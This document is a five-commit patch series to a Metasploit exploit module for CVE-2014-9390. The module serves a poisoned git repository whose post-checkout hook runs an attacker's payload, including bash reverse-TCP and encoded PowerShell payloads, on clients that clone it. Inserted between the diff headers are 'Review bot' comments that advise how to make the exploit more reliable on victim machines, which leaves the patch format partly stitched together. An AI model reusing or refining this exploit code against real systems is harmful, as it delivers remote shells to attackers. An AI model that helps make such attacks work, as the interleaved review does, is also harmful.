From 42a10d6d5097f83928f0fe55b611109febe32cc5 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 23 Dec 2014 14:07:57 +0000
Subject: [PATCH 1/5] Add Powershell target

---
 modules/exploits/multi/http/cve_2014_9390.rb | 17 ++++++++++++++++-
 1 file changed, 16 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb
index 5e51806209..e74acabf64 100644
--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -9,6 +9,7 @@ class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(
@@ -72,6 +73,13 @@ class Metasploit4 < Msf::Exploit::Remote
           'Platform' => [ 'unix' ],
           'Arch' => ARCH_CMD
         }
+      ],
+      [
+        'Windows Powershell',
+        {
+          'Platform' => [ 'windows' ],
+          'Arch' => [ARCH_X86, ARCH_X86_64]
+        }
       ]
     ],
     'DefaultTarget' => 0))
@@ -120,7 +128,14 @@ class Metasploit4 < Msf::Exploit::Remote
     # .git/hooks/post-checkout and will subsequently execute commands of our
     # choosing upon cloning
     # build the hook file blob
-    full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
+    puts target.inspect
+    case target.name
+    when 'Automatic'
+      full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
+    when 'Windows Powershell'
+      full_cmd = "#!/bin/sh\n#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}"
+    end
+
     sha1, content = build_object('blob', full_cmd)
     trigger = "/objects/#{get_path(sha1)}"
     @repo_data[:git][:trigger] = trigger

From 43221d4cb09f6faf4c28c94da9be8bbf52ab43ea Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 23 Dec 2014 14:09:12 +0000
Subject: [PATCH 2/5] Remove redundant debugging stuff

---
 modules/exploits/multi/http/cve_2014_9390.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb
index e74acabf64..e984aa3930 100644
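Review bot: The new `case target.name` in the last hunk has no `else`, so a target whose name matches neither branch leaves `full_cmd` nil and `build_object('blob', full_cmd)` is handed a nil blob with no explanation; the target table lives elsewhere, so this only bites when a target is added or renamed later, but the failure mode is obscure. Add `else fail_with(Failure::BadConfig, "Unsupported target: #{target.name}")` before the `end` so the mismatch is reported where it occurs (use `Failure::Unknown` if `BadConfig` is not available in the framework version in use). The Windows branch also keeps the `#!/bin/sh` interpreter line, which presumably relies on the sh shipped with the victim's git client being the thing that runs hooks; a comment such as `# git runs hooks through its own sh even on Windows, which then launches powershell.exe` would make that assumption explicit. The enclosing method starts before the hunk.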
--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -128,7 +128,6 @@ class Metasploit4 < Msf::Exploit::Remote
     # .git/hooks/post-checkout and will subsequently execute commands of our
     # choosing upon cloning
     # build the hook file blob
-    puts target.inspect
     case target.name
     when 'Automatic'
       full_cmd = "#!/bin/sh\n#{payload.encoded}\n"

From 313d6cc2f8308d2ab3e3d5f3ee1e9482ed118bcb Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 23 Dec 2014 14:12:47 +0000
Subject: [PATCH 3/5] Add super call

---
 modules/exploits/multi/http/cve_2014_9390.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb
index e984aa3930..c6894ba08b 100644
--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -110,6 +110,8 @@ class Metasploit4 < Msf::Exploit::Remote
     end
     setup_git unless git_uri.blank?
     setup_mercurial unless mercurial_uri.blank?
+
+    super
   end
 
   def setup_git

From a3b0b9de62bbe852626be73a1451349098fd13d8 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 23 Dec 2014 14:19:51 +0000
Subject: [PATCH 4/5] Configure module to target bash by default

---
 modules/exploits/multi/http/cve_2014_9390.rb | 29 ++++++++++----------
 1 file changed, 15 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb
index c6894ba08b..707eadcbf2 100644
--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
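Review bot: The bare `super` added at the end of the method in the `@@ -110,6 +110,8 @@` hunk forwards the method's arguments unchanged and is deliberately placed after `setup_git`/`setup_mercurial`, but nothing in the hunk records why the parent call has to come last. If this is the module's `setup` override, the parent is presumably where the HTTP service is brought up, and a one-line comment such as `# start the parent's HTTP service only once the repo objects are ready to serve` would capture that ordering requirement for the next maintainer. The method's signature is outside the hunk, so I cannot confirm it is `setup`; if it is a different method, the comment should say what the parent call does there instead.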
@@ -54,24 +54,21 @@ class Metasploit4 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Dec 18 2014',
 
-      # TODO: correct all of this
-      'Payload' =>
-        {
-          'Compat' =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl bash'
-            },
-          'EncoderType' => Msf::Encoder::Type::Raw
-        },
-      'Platform' => %w(osx win),
-      'Targets' =>
+      'Targets' =>
         [
           [
             'Automatic',
             {
               'Platform' => [ 'unix' ],
-              'Arch' => ARCH_CMD
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd_bash',
+                      'RequiredCmd' => 'generic bash-tcp'
+                    },
+                }
             }
           ],
           [
@@ -134,7 +131,11 @@ class Metasploit4 < Msf::Exploit::Remote
     when 'Automatic'
       full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
     when 'Windows Powershell'
-      full_cmd = "#!/bin/sh\n#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}"
+      psh = cmd_psh_payload(payload.encoded,
+                            payload_instance.arch.first,
+                            remove_comspec: true,
+                            encode_final_payload: true)
+      full_cmd = "#!/bin/sh\n#{psh}"
     end
 
     sha1, content = build_object('blob', full_cmd)

From 16302f752e4adcf14f0f0d6b409ba46924289156 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 23 Dec 2014 14:22:26 +0000
Subject: [PATCH 5/5] Enable generic command

---
 modules/exploits/multi/http/cve_2014_9390.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb
index 707eadcbf2..763a18f04b 100644
--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -65,7 +65,7 @@ class Metasploit4 < Msf::Exploit::Remote
                 {
                   'Compat' =>
                     {
-                      'PayloadType' => 'cmd_bash',
+                      'PayloadType' => 'cmd cmd_bash',
                       'RequiredCmd' => 'generic bash-tcp'
                     },
                 }
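Review bot: The Automatic target now pins the payload to `cmd_bash` with `RequiredCmd 'generic bash-tcp'` in the `@@ -54,24 +54,21 @@` hunk, yet the hook blob built later in the file (the `full_cmd = "#!/bin/sh\n#{payload.encoded}\n"` context line in the following hunk) still declares `#!/bin/sh` as its interpreter. If the selected payload relies on bash-only features such as `/dev/tcp`, it will fail on any victim where `/bin/sh` is dash or another POSIX shell, which is exactly the configuration this commit's title says it is targeting. Either the hook for this target should start with `#!/bin/bash` (or wrap the command as `bash -c '...'`), or the compat entry should carry a comment stating the assumption, e.g. `# cmd_bash payloads assume /bin/sh is bash on the victim; the hook blob uses #!/bin/sh`. The `initialize` call this hash belongs to starts before the hunk.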
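Review bot: The Windows branch in the `@@ -134,7 +131,11 @@` hunk builds `full_cmd = "#!/bin/sh\n#{psh}"` without the trailing newline that the Automatic branch appends, so the hook blob for this target ends without a line terminator; most shells tolerate that, but the two branches should produce the same file shape, `full_cmd = "#!/bin/sh\n#{psh}\n"`. `remove_comspec: true` looks right given the `#!/bin/sh` line, since the hook is presumably started by a shell rather than by cmd.exe; a comment such as `# hook is launched by git's sh, so no cmd.exe /c wrapper is needed` would record why that option is set. The method body continues outside the hunk.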